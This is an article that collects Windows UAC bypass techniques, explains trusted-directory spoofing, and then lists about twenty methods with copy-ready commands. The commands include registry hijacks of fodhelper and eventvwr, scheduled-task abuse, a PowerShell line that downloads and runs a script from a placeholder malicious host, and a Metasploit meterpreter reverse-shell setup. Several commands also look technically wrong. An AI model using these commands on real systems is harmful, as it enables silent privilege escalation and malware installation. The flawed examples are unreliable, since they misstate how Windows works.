Windows UAC Bypass Techniques

Bypassing User Account Control (UAC) by Spoofing Trusted Directories

Introduction

Welcome to a detailed exploration of an innovative method to bypass the User Account Control (UAC) in Windows 10 Build 17134. This article will discuss the structure and vulnerabilities of UAC, introducing a newly discovered bypass method. It is important to note that Microsoft does not consider UAC a security boundary, but it remains a critical layer for defense in depth. Here, I will share a technique that, although complex, reveals significant vulnerabilities within the Windows permission system.

What is UAC?

User Account Control (UAC) is a feature in Windows that helps prevent unauthorized changes to the system by requiring administrative privileges to be confirmed before performing actions that could affect the system's operation or change settings that affect other users. UAC prompts help prevent malware from performing privileged actions without the user's knowledge.

UAC Operation

When an action requiring elevated privileges is needed, UAC interacts with the user to confirm the operation. There are exceptions where some executables are pre-authorized by the system to run with elevated privileges without prompts, depending on specific security checks that verify the executable's integrity and authenticity.

UAC Bypass: The Directory Spoofing Technique

Requirement 1: Auto-Elevation of Privileges

appinfo.dll processes requests for privilege escalation through RPC calls, where it checks if the executable has an "autoElevate" key set to true in its manifest. If true, the executable is considered trustworthy for auto-elevation.

Requirement 2: Signature Verification

The executable must also pass a signature check using the WinVerifyTrust function. This ensures that only applications signed by trusted entities can auto-elevate.

Requirement 3: Execution from a Trusted Directory

Finally, the executable needs to be located in a directory considered secure by the system, such as C:\Windows\System32.

Bypass Strategy

The technique exploits the strict verification of trusted directories by manipulating paths. By creating a directory named "C:\Windows\ " (note the space), we can fool the initial path verification performed by Windows.

Bypass Implementation

• Creating the Spoofed Directory: We use the CreateDirectory function with the "\?" prefix to bypass system naming restrictions and create the spoofed directory.

• Copying an Authorized Executable: We move an auto-elevating executable, such as winSAT.exe, to the fake directory.

• Executing the Executable: When winSAT.exe is run from the fake directory, the system performs the elevation of privileges as if it were from a trusted directory.

Scheduled Tasks Bypass

• Description: This method involves creating a scheduled task that executes with elevated privileges, thus bypassing UAC.

• Command Example:

  Copy

  # Create a scheduled task to run a PowerShell script with elevated privileges
  schtasks /create /tn "MyTask" /sc once /tr "powershell.exe -ExecutionPolicy Bypass -File C:\Path\To\Script.ps1" /st 00:00
  schtasks /run /tn "MyTask"
  schtasks /delete /tn "MyTask" /f

Environment Variable Manipulation

• Description: By modifying environment variables that Windows checks before executing certain trusted binaries, attackers can redirect these executions to malicious files.

• Command Example:

  Copy

  # Temporarily modify the environment path to include a malicious directory
  set PATH=C:\Malicious;%PATH%
  start trustedbinary.exe

Event Viewer Bypass

• Description: A classic technique where the Microsoft Management Console (MMC) related to the event viewer is hijacked to execute a malicious payload.

• Command Example:

  Copy

  # Use eventvwr to execute a custom MMC snap-in
  reg add "HKCU\Software\Classes\mscfile\shell\open\command" /t REG_SZ /d "cmd.exe /c start C:\Path\To\Malicious\payload.exe" /f
  eventvwr.exe
  reg delete "HKCU\Software\Classes\mscfile\shell\open\command" /f

Mock Folders Bypass

• Description: Exploiting the way Windows handles file paths to trick the system into executing a malicious program from a mock system directory.

• Command Example:

  Copy

  # Create a mock system folder and place a malicious executable disguised as a trusted system utility
  mkdir "C:\Windows \System32"  # Notice the space after Windows
  copy C:\Path\To\Malicious\executable.exe "C:\Windows \System32\trustedutility.exe"
  start "C:\Windows \System32\trustedutility.exe"

Token Impersonation

• Description: This method involves creating a token that has high privileges and then impersonating that token to perform elevated operations.

• Command Example:

  Copy

  # Use Invoke-TokenManipulation from PowerSploit to impersonate a token
  Import-Module .\PowerSploit\Exfiltration\Invoke-TokenManipulation.ps1
  Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"

Bypass Using SilentCleanup

• Description: This technique exploits the Windows "SilentCleanup" task, which runs with elevated privileges and does not prompt UAC.

• Command Example:

  Copy

  # Place a malicious script in the location that SilentCleanup checks
  $mPath = "C:\Windows\Temp\custom\malicious.ps1"
  $triggerPath = "C:\Windows\System32\cleanmgr.exe"
  New-Item -ItemType Directory -Path "C:\Windows\Temp\custom"
  Set-Content -Path $mPath -Value "IEX (New-Object Net.WebClient).DownloadString('http://malicious.url/script')"
  schtasks /create /tn "CleanUpMalicious" /xml "C:\Windows\System32\Tasks\Microsoft\Windows\DiskCleanup\SilentCleanup" /tr $triggerPath
  schtasks /run /tn "CleanUpMalicious"
  schtasks /delete /tn "CleanUpMalicious" /f

UAC Bypass via ICMLuaUtil Elevated COM Interface

• Malware Examples: DarkSide, LockBit, TrickBot

• Description: This technique utilizes the ICMLuaUtil COM interface, which is often allowed to bypass UAC due to its elevated privileges.

• Command Example:

  Copy

  # Create an instance of the ICMLuaUtil interface and execute a command
  $comObject = New-Object -ComObject "ICMLuaUtil"
  $comObject.ShellExec("cmd.exe", "/c start notepad.exe", "", "runas", 1)

UAC Bypass via ComputerDefaults Execution Hijack

• Malware Examples: ClipBanker, Quasar RAT

• Description: Hijacks the execution path of ComputerDefaults.exe to run malicious code with elevated privileges.

• Command Example:

  Copy

  # Hijack the executable path in the registry
  Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\shell\open\command" -Name "(Default)" -Value "cmd.exe /c calc.exe"
  Start-Process "ComputerDefaults.exe"

UAC Bypass via Control Panel Execution Hijack

• Malware Examples: AveMaria, Trojan.Mardom

• Description: Modifies registry keys associated with Control Panel items to execute malicious payloads.

• Command Example:

  Copy

  # Redirect Control Panel item to execute malicious code
  Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" -Name "DelegateExecute" -Value "C:\Path\To\Malicious\payload.exe"
  Start-Process "control.exe"

UAC Bypass via DiskCleanup Scheduled Task Hijack

• Malware Examples: RedLine Stealer, Glupteba

• Description: Utilizes the Disk Cleanup task, which typically runs with elevated privileges, to execute malicious scripts.

• Command Example:

  Copy

  # Place malicious script in Disk Cleanup task location
  schtasks /create /tn "CleanUpTask" /tr "C:\Malicious\script.bat" /sc once /st 00:00
  schtasks /run /tn "CleanUpTask"

UAC Bypass via FodHelper Execution Hijack

• Malware Examples: Glupteba, BitAT dropper

• Description: Abuses the auto-elevation setting of fodhelper.exe to execute without UAC prompts.

• Command Example:

  Copy

  # Use fodhelper to bypass UAC
  New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Force
  Set-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name "DelegateExecute" -Value ""
  Set-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name "(Default)" -Value "cmd.exe /c start powershell.exe -ExecutionPolicy Bypass -NoExit -Command 'Start-Process notepad.exe -Verb runAs'"
  Start-Process fodhelper.exe

UAC Bypass Attempt via Windows Directory Masquerading

• Malware Examples: Remcos RAT

• Description: This method involves creating a directory that masquerades as a system directory to trick Windows into executing a malicious payload.

• Command Example:

  Copy

  # Create a masquerading Windows directory and execute a payload
  mkdir "C:\Windows \System32"
  echo "Malicious script" > "C:\Windows \System32\malicious.bat"
  start "C:\Windows \System32\malicious.bat"

Metasploit UAC Bypass

• Description: Metasploit offers several modules specifically designed to bypass UAC, leveraging known vulnerabilities and techniques.

• Metasploit Command Example:

  Copy

  # Use Metasploit to exploit UAC
  msfconsole
  use multi/handler
  set SESSION 1
  set PAYLOAD windows/x64/meterpreter/reverse_tcp
  set LHOST [YourLocalIP]
  set LPORT 4444
  exploit
  use exploit/windows/local/bypassuac
  <-------->
  use exploit/windows/local/bypassuac_sluihijack
  set payload windows/x64/meterpreter/reverse_tcp
  <-------->
  use exploit/windows/local/bypassuac_fodhelper 

  This Metasploit module will attempt to bypass UAC on a target Windows machine to deliver a reverse shell to the attacker.

Silent Process Exit Bypass

• Description: Uses the Silent Process Exit registry keys to execute arbitrary commands with elevated privileges without triggering UAC.

• Command Example:

  Copy

  # Setting Silent Process Exit to execute a malicious payload
  reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\explorer.exe" /v "ReportingMode" /t REG_DWORD /d 1 /f
  reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\explorer.exe" /v "MonitorProcess" /d "C:\Path\To\Malicious\payload.exe" /f

App Paths Bypass

• Description: Manipulates the application paths in the registry to redirect the execution of legitimate applications to malicious executables.

• Command Example:

  Copy

  # Manipulate App Paths to redirect to a malicious executable
  Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\calc.exe" -Name "(Default)" -Value "C:\Path\To\Malicious\payload.exe"
  Start-Process "calc.exe"

Mocking Trusted Directories

• Description: Involves creating directories that mock trusted paths to mislead the system into executing malicious files, thinking they are trusted applications.

• Command Example:

  Copy

  # Create a mock directory and execute a malicious file
  mkdir "C:\Program Files\TrustedDir"
  copy "C:\Path\To\Malicious\file.exe" "C:\Program Files\TrustedDir\trustedapp.exe"
  start "C:\Program Files\TrustedDir\trustedapp.exe"

Conclusion

This UAC bypass method, while effective, highlights the need for ongoing revision of security policies and access control implementations by Microsoft. Sharing and understanding these techniques is crucial to strengthening defenses against attacks that seek to exploit gaps in seemingly robust security mechanisms.

References

• Habr Article on UAC Bypass Techniques

• Juggernaut Security UAC Bypass

• Elastic Security Labs on UAC Bypasses

• Fortinet on UAC Bypass Techniques

• GitHub UAC Bypass Collections

• UACME Repository on GitHub

• Tenable TechBlog on UAC Bypass